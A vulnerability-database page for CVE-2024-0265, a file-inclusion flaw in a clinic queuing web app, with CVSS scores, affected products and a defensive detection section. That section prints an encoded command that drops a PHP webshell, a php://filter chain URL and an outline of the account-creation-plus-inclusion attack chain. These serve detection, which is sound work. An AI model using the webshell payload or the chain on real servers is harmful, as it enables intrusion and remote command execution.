cbcvebase.
CVE-2024-0265
published 2024-01-07

CVE-2024-0265: A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been rated as critical. This issue affects some unknown processing of the file…

PriorityP272high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
20.94%
97.2th percentile
A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component GET Parameter Handler. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249821 was assigned to this vulnerability.

Affected

2 ranges
VendorProductVersion rangeFixed in
oretnom23clinic_queuing_system
sourcecodesterclinic_queuing_system

Detection & IOCsextracted from sources · hover to see the quote

url/index.php?page=php://filter/convert.iconv.UTF8.CSISO2022KR|...|convert.base64-decode/resource=home
path/LoginRegistration.php?a=save_user
path/LoginRegistration.php?a=login
path/rce.php
filenamerce.php
commandfile_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'))
  • Detect LFI via PHP filter chain in the 'page' GET parameter of /index.php — look for requests containing 'php://filter' and multiple 'convert.iconv' or 'convert.base64' segments in the page parameter.
  • Monitor for creation of 'rce.php' in the web root, which is the dropped PHP backdoor (base64 payload decodes to a PHP webshell executing GET parameter 0 via backtick shell execution).
  • Detect the two-stage exploit: first a POST to /LoginRegistration.php?a=save_user to create a rogue admin account, followed by POST to /LoginRegistration.php?a=login and then GET to /?page= with a php://filter chain.
  • The exploit uses a canary string 'jmrcsnchz' in the RCE payload to confirm code execution; look for this string in HTTP responses or server-side logs.
  • The dropped webshell (rce.php) is accessed via GET requests with a numeric parameter '0' containing OS commands (e.g., ?0=whoami); monitor for GET requests to /rce.php with shell command strings.
  • ·The exploit chains CVE-2024-0264 (unauthenticated admin account creation) with CVE-2024-0265 (authenticated LFI via PHP filter chain); both CVEs must be present for the full RCE chain to work.
  • ·The vulnerability is specific to Clinic Queuing System version 1.0 running on PHP with SQLite3; the PHP filter chain technique requires the iconv and base64 filter wrappers to be enabled on the server.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.